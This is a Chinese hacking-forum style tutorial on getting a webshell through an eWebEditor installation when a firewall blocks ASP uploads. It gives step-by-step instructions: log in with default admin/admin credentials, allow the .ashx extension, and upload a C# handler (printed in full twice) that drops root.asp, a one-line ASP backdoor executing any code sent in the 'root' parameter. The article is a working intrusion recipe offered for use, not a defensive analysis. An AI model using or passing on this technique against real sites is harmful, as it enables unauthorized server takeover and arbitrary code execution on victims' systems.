ewebeditor 上传遇到防火墙限制的解决办法 图文
发布时间:2011-05-10 22:18:45 作者:佚名 
我要评论
我要评论今天看了前面的原创帖子说到eweb遇到asp,asa,cer被限制访问拿不了shell,正好这个问题我是知道的。应该很多大牛都会的吧,估计还是有些不会的,就将就看看吧
这是一个eweb入口(废话)
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {return false; }
}
}
然后直接访问它。。
用默认帐户密码admin admin进入
样式添加asa扩展名
直接上传asp马
到这里都是顺利的,但是。。当你访问马的时候。。
试过了小马,一句话,会出现同样的问题
解决方法:
在样式添加里加上扩展名ashx
创建一个1.ashx的文件, 上传,代码如下:
复制代码
代码如下:<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {return false; }
}
}
它会在当前目录生成一个root.asp的一句话木马,密码为root
然后连接一句话木马就可以啦~~
拿到shell
相关文章
- 云火墙与云防火墙的区别是什么?下面为大家介绍。2012-10-19
- 可以通过ssh反向连接到内网主机(有防火墙的主机),了解下,方便我们以后防御2012-07-30
- RedHatLinux为增加系统安全性提供了防火墙保护。防火墙存在于你的计算机和网络之间,用来判定网络中的远程用户有权访问你的计算机上的哪些资源2012-07-13
- Firewall 防火墙,工作在网络或主机的边缘,对进出本网络或主机的数据包根据事先设置好的规则进行检查并且能够在数据包匹配到之后由预置的动作进行处理的组件的组合2012-07-11
- 这几天发现服务器上的Jmail发邮件失败,又不返回任何错误,只是发送过程很快,像是根本没执行,测试发现程序是顺利执行完成的2011-05-23
- 经典高招打造自己的超级电脑防火墙网络安全中谈到个人上网时的安全,还是先把大家可能会遇到的问题归个类吧。2011-02-27
- iptables 这个指令, 如同以下用 man 查询所见, 它用来过滤封包和做NAT Network Address Translation(网路位址转译), 这个指令的应用很多, 可以做到很多网路上的应用.2009-06-18
- 扫不出肉鸡有很多的可能!一般有如下的情况! 1.你系统的防火墙,或某些补丁作怪! 2.有些地方是扫不到肉鸡的(是不是和各地的电信有关,暂时还不知道) 3.机子2008-10-08
- 弄到一个sa权限,利落得拿到一个webshell,透过sqlrootkit,俺就是system权限了.本以为对方菜到家了.谁知故事才刚刚开始.2008-10-08
- 前几天群里的兄弟给了一个网站,问我可不可以入侵2008-10-08
最新评论